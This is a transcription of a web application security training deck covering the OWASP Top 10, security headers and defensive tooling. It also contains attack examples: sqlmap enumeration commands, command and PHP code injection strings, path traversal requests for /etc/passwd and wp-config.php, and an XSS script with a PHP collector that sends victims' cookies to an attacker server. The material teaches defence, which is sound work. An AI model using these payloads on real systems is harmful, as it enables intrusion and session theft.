Web Application Security. Sytech System Co.,Ltd.

Transcription

1 Web Application Security Sytech System Co.,Ltd. 1

2 Wiswat Aswamenakul Bachelor of Engineer (Computer Engineer), KU Master of Digital Forensics, Edith Cowan, AUS Responsibility Certification Penetration Testing Digital Forensics Security Research Instructor OSCP, GPEN, GWAPT Interesting Area Community Offensive security Incident investigation 2600Thailand OWASP Thailand Chapter Member 2

3 Wiswat Aswamenakul Public Disclosure Dotclear SSRF/XSPA Vulnerability Dotclear Malicious File Upload Restriction Bypass Dotclear Directory Download Vulnerability Bypass Imperva by confusing HTTP Pollution Normalization Engine Responsive Filemanger <= Arbitrary File Disclosure Two Wordpress Plugins Bug Bounty Splitwise Udemy Foxycart Blinksale 3

4 Thanate Amorntusanasuk Bachelor of Science (Information Communication Technology (ICT)), NPRU Master of Master of Science in Information Systems Security (MISS), MUT Responsibility Certification Cyber Intelligence Cybersecurity assessment Penetration Testing Digital Forensics C EH, C HFI, Security+, MCSA, MCSD Interesting Area Offensive security Cyber Intelligence 4

5 Agenda Introduction OWASP & OWASP Top 10 Tools Web Application Vulnerability Scanner Web Application Firewall 5

6 Website Security 6

7 Enterprise point of view Security does not make money Only functional tests are performed Security test is neglected Many developers do not have security in mind Lack of secure coding knowledge Secure coding rarely teaches in university Situation Developers No secure coding Admin No security testing What about WAF?? hehe ;D 7

8 Application Security Secure Development Life Cycle (SDLC) Best remediation (Root cause) Web Application Firewall Delay attacks Detect attacks 8

9 Understand Web Technology Penetration testers have different view point than users, developers, admins (Maliciously) think out of the box Mindset Any restriction bypass? Business login bugs? Mistakes that users, dev, admins normally make? 9

10 Web Components Web Application Develop by programmers Services 3 rd -party software Web server FTP Operating System Windows Linux All components can be vulnerable 10

11 Host Security Attacker point of view Service Scan Vulnerability Scan Defender point of view Hardening Scanning result Guideline (Benchmark) 11

12 Host Security Our focus Linux (Ubuntu) Apache PHP MyQL 12

13 HTTP Header Security 13

14 Header Security Defense in depth HTTP headers Some help to improve security Some are specific to browsers (still not break others) Could impact a design of application Some need to be set by system administrators (not developers) Example HTTP Strict Transport Security X-Frame-Options X-XSS-Protection X-Content-Type-Options 14

15 HTTP Strict Transport Security HSTS Browsers connect to HTTP only the very first Later on, browsers are forced to directly communicate though port 443 (HTTPS) Help to protect users from SSL Strip attack 15

16 X-XSS-Protection Enable built-in browser XSS protection to protect uses from reflect XSS attack Defense in depth Settings 0 1 1; mode=block 1; report= 16

17 X-Content-Type-Options Please give a big hand to our main character Since IE 8, M$ has decided to disable MIME Type Sniffing 17

18 MIME Type URL: Why is it necessary?? 18

19 What IE says Lemme check No, it is not id**t.. It is html file.. I will render it as html.. Don t fool me bro Give me logo.png Here it is and this file is png type 19

20 X-FRAME-OPTIONS X-FRAME-OPTIONS is a http response header Require browsers to support Value Deny Sameorigin Allow-from: uri Deny and Sameorigin are currently supported Allow-from is supported on limited browsers 20

21 Same Origin Policy Origin Protocol Host port Scripts of origin A cannot access information on origin B 21

22 Same Origin Policy For example Same origin All different origin

23 OWASP Open Web Application Security Project Facebook Group: 23

24 OWASP Dev Guide Current Stable Version (2005) Developing Version 3.0 (rewrite 2014) 24

25 OWASP Top 10 (2013) Year 2004, 2007, 2010,

26 OWASP Top 10 (2017) (RC) 26

27 Core Concept validate Encoding User Application Service Encoding validate User, attacker 3 rd party service, Data storage 27

28 Core Concept Identify your inputs and outputs Allow validation must be done on server side Server side validation is mandatory Client side validation is optional Whitelisting is the most preferable methodology Logging for later investigations or audits 28

29 Logging Probably enforce by compliance Sensitive activities Administrative activities Authentication Financial-related transaction Errors 29

30 Logging Information to be logged What (action?) Where (who, location, ip address?) When (time?) Tampered proof Remote Logging 30

31 Information Disclosure 31

32 Robots.txt Robots.txt is used to prohibit search engines from crawling web pages as specified in the robots.txt Content of the file is accessible to anyone HTML Tag to control Search bot (add in View) INDEX: search engine robots should include this page. FOLLOW: robots should follow links from this page to other pages. NOINDEX: links can be explored, although the page is not indexed. NOFOLLOW: the page can be indexed, but no links are explored. NONE: robots can ignore the page. <META NAME= ROBOTS CONTENT= INDEX,NOFOLLOW > 32

33 Robots.txt 33

34 HTML Comment There always are useful information (for hackers) in HTML source code HTML Comment is one place to look up For example Username + password CMS version Unused files which are never removed 34

35 HTML Comment Spot anything interesting?? 35

36 Directory Listing Directory Listing or Directory Browsing Due to inappropriate configurations, it is allowed to list all files and directories existing in a current path Search for something like index.aspx, index.html Show all contents if they are not exist 36

37 Backup files bak, txt, src, dev, old, inc, orig, copy, tmp 37

38 Security Configuration Server hardening Various across server types using 38

39 Security Configuration Default accounts Enable error message for developers Connect database with privilege account Connect database with shared account Users that run database server Users that run web server or application server No TLS for secure transfer 39

40 Security Configuration Expose admin interface This feature should also be secured Web interface for Management Database LDAP 40

41 Inspect HTTP Request & Reponse Local Proxy Burp Suite Proxy option (set listening port) Proxy HTTP History Repeater Target scope Decoder OWASP ZAP 41

42 A2 Broken Authentication and Session Management 42

43 A2 Broken Authentication and Session Management Session assets such as user credentials, session id, are not properly protected 43

44 Authentication User ID, Display Name, User ID uses for log in Display Name uses for display to public Protect from username exposure 44

45 Username Harvesting Differentiate between wrong username and wrong password Ref: 45

46 Bruteforce Attack Target Password Information, such as, tel no Protection Prevent automate Decrease possibility to hit the targets 46

47 Prevent Automate Mechanism Captcha Rate limit Re-enter password 47

48 Password Strength Password Security Length Age Complexity Complexity A-Z a-z 0-9 Special characters 48

49 Password Storage Password Storage Salt Hashing Computation speed 49

50 Re-authentication for Sensitive Feature Any sensitive features should require re-authentication before granting the activities Example Require password when changing Require password when creating admin users etc 50

51 Session ID Session ID Unpredictable Unique Resilience against bruteforce What we got from crypto topic? Built-in PHP session ID 51

52 Session ID Exposure Session ID might associate with user data Users might accidentally send their session ID to others Session ID should be sent through cookie header or POST payload $_SESSION variables, by default, create session ID in cookie header 52

53 Cookie Same concept as session Add mechanism to persist across reboot $_COOKIE Information is exposed to users!! 53

54 Cookie Attacker perspectives It is an input Data injection attack Spoof to impersonate users Predictable value Meaningful value Cookie is stored on shared computers 54

55 Cookie Usage Reduce sensitive information leak, such as, password or password hash Encryption + Signature (Hash, HMAC) Properly use Expiration Authentication value Username? Password hash? Some forms of hashing of personal info 55

56 A1 Injection 56

57 SQL Injection Allow attacker to inject SQL statements Impact Database access, modify or delete Authentication bypass File reading Create a backdoor 57

58 SQL Injection Attacker-controlled sql statement can be injected in category 58

59 SQL Injection Prevention Input validation (whitelisting is prefer) Parameterized Query (use properly) 59

60 Parameterized Query Distinguish between code and data 60

61 Parameterized Query What I found during source code review project!!! Do not do this!! 61

62 Parameterized Query Valid to use with data only Cannot use with any parts of statement Table name Column name Order clause 62

63 SQLMap SQL Injection exploitation tools Download Bundled with Kali 63

64 SQLMap sqlmap -u p id sqlmap -u p id --schema sqlmap -u p id D testdb / --table sqlmap -u p id D testdb / -T testtable --columns sqlmap -u p id D testdb / -T testtable C username,password sqlmap -u p id -schema / --cookie= uid=1; token=aswrelkjldsa; 64

65 Command Injection Accept inputs as a part of OS command and later on execute the command Functions exec system passthru shell_exec 65

66 Command Injection SkyBlueCanvas CMS 1.1 POST Request name=test ; id 66

67 Countermeasure Avoid directly execute OS command, especially when inputs are part of the command Whitelisting inputs escapeshellarg function 67

68 Code Injection Inappropriate use of dangerous functions which allow attackers to inject PHP code to execute on the server Functions eval preg_replace create_function 68

69 Code Injection //eval $code = eval($_get[ code ]); //preg_replace $out = preg_replace( /.*/ie, $1, $_GET[ code ]); //create_function $func = create_function( $a,$b, $_GET[ code ]); $func(); 69

70 Code Injection Wordpress Plugin Is-human engine.php?action=log-reset&type=ih_options();passthru(whoami);error 70

71 Countermeasure Avoid evaluating inputs as codes Whitelisting inputs 71

72 Malicious File Upload Upload feature that does not properly verify the uploading file which allow attackers to upload PHP backdoor script to the server 72

73 Malicious File Upload 73

74 Malicious File Upload WordPress Shopping Cart

75 Malicious File Upload 75

76 Countermeasure Check extension (Mandatory) Check MIME Type Specify uploaded file extension according to verification result Unpredictable file name Keep uploaded files on separate servers Keep uploaded files outside document root 76

77 A4 Insecure Direct Object Reference 77

78 A4 Insecure Direct Object References Insecure Direct Object References Path Traversal File Inclusion File Disclosure 78

79 Path Traversal./ Current directory../ Parent directory..\ Windows (Parent directory) Equivalent path /var/www/images/../include/config.php /var/www/include/config.php 79

80 File Inclusion Remote File Inclusion Include a file from remote source php.ini allow_url_include On Local File Inclusion Include a file from local server Functions include include_once require require_once 80

81 File Inclusion Adem index.php?file=/etc/passwd index.php?file=images/backdoor.jpg 81

82 File Disclosure Disclose contents of files on a server Functions fopen file_get_contents readfile etc 82

83 File Disclosure Wordpress CodeArt Google MP3 Player plugin plugins/page.php?file=/etc/passwd plugins/page.php?file=../wp-content/wp-config.php 83

84 File Deletion plugins/page.php?deletetorrent=../wp-content/wp-config.php 84

85 Countermeasure Sanitize inputs if direct referencing is required Whitelisting What about path starting with / What about../ or..\ Avoid direct reference Example of indirect referencing Id = 1 include language.php Beware other vulnerability ie, sql injection 85

86 A7 Missing Function Level Access Control There is no appropriate access control before allow accessing to functions Example

87 Attacks Insecure ID Forced Browsing Path Traversal File Permission 87

88 Insecure ID After success authentication User A ID 1 Give me profile of id 1 Select info of id 1 Here it is Here it is User B ID 2 Give me profile of id 2 Select info of id 2 Here it is Here it is 88

89 Insecure ID After success authentication User A ID 1 Give me profile of id 2 Select info of id 2 Here it is Here it is 89

90 Insecure ID Ref: 90

91 Forced Browsing A menu when logging in as admin - /profile.php - /adduser.php - /changepass.php - /logout.php A menu when logging in as user - /profile.php - /changepass.php - /logout.php user GET /adduser.php Here it is user GET /adduser.php You are not allowed to access this page 91

92 A3 Cross-Site Scripting (XSS) 92

93 A3 Cross-Site Scripting (XSS) Attackers inject client-side scripts into a target web page and lure victims to execute those scripts on their browser which inherently utilize the victims session Three major types of XSS Reflected XSS Stored XSS Dom-based XSS 93

94 Reflected XSS 94

95 Stored XSS 95

96 Dom-based XSS /page.html?default=french /page.html?default=<script>alert(document.cookie)</script> /page.html#default=<script>alert(document.cookie)</script> 96

97 XSS 2. Victim accesses the target server and injected script gets executed on victim browser 1. Attacker injects scripts to a target server Or Send URL with injected script to a victim 97

98 Cookie Stealing with XSS Cookie is a representation of username and password If the cookie is stolen, an attacker could impersonate the owner of the stolen cookie 98

99 Script Script payload <script> var img = new Image(); Img.src = + document.cookie; </script> data.php <?php $d = $_GET[ d ]; $f = fopen( cookie.txt, w+ ); fwrite($f, $d); fclose($f);?> 99

100 Cookie Stealing Attacker server Target server 2. Victim accesses the target server and injected script gets executed on victim browser 1. Attacker injects scripts to a target server Or Send URL with injected script to a victim 3. Cookie is secretly sent to attacker server 100

101 BeEF BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Download Bundled with Kali 101

102 Cookie Flags There is flags that enforces how to access cookie values HTTPOnly not allow to access by client-side scripts Secure not allow to access by unencrypted protocol Set on server-side 102

103 Cookie Flags Ref:

104 Countermeasure Encode characters when printing any data influenced by inputs into HTML page (output page) Useful function htmlspecialchars HTML entity code 104

105 Countermeasure HTML entity table Ref: 105

106 Without filter <?php $name = $_GET['name']; echo "Hello: ". $name;?> 106

107 With filter <?php $name = $_GET['name']; $name = htmlspecialchars($name, ENT_QUOTES); echo "Hello: ". $name;?> 107

108 A8 Cross-Site Request Forgery (CSRF) 108

109 Cross-Site Request Forgery (CSRF) An attacker forces victim to request for resources without the victims knowledge by luring them to surf a crafted web page 109

110 login session Get profile + session profile Get profile + session profile 110

111 <img src= > Get profile + session 111

112 <img src= > Transfer money to attacker account 1000 baht + session 112

113 Counter Measure Add CSRF protection token Server sends a random token to a client before any critical actions Server validates the token when the client tries to perform the critical actions 113

114 Give me Transfer form This is the form and token is b59cc13f9 Transfer money to merchant 1000 baht + Token + session The transaction is done 114

115 <img src= > Transfer money to attacker account 1000 baht + session Where is the token? This transfer was not happened 115

116 CSRF 116

117 Web Application Security Testing Tools 117

118 Web Application Security Testing Tools Dynamic Application Security Testing Tools (DAST) Web Application Vulnerability Scanner Web Inspect Appscan Acunetix W3af Arachni Static Application Security Testing Tools (SAST) Source Code Scanner Fortify Appscan Checkmarx Armorize 118

119 Tools Pros Fast Easy to use Cons False positive True negative Result interpretation 119

120 Web Application Vulnerability Scanner Various tools are available, for example, Acunetix Arachni W3af Execution concept Select signature (profile) Select scanning options Insert target 120

121 Web Application Vulnerability Scanner Dealing with authentication Cookie Burp could help Login sequence Feature for specific software Different across software 121

122 Web Application Firewall Web Application Firewall (WAF) Specifically implemented to detect and delay attacks Not a panacea (Can be bypassed) Cannot detect a lot of attacks but also can protect from a lot of attacks Relevant parties Implementers person who know how to configure WAF Consultant person who know how to attack website and tune WAF to suite your environment 122

123 Web Application Firewall Opensource Modsecurity + apache Naxsi + Nginx Commercial Imperva F5 Barracuda Citrix etc 123

124 Q & A 124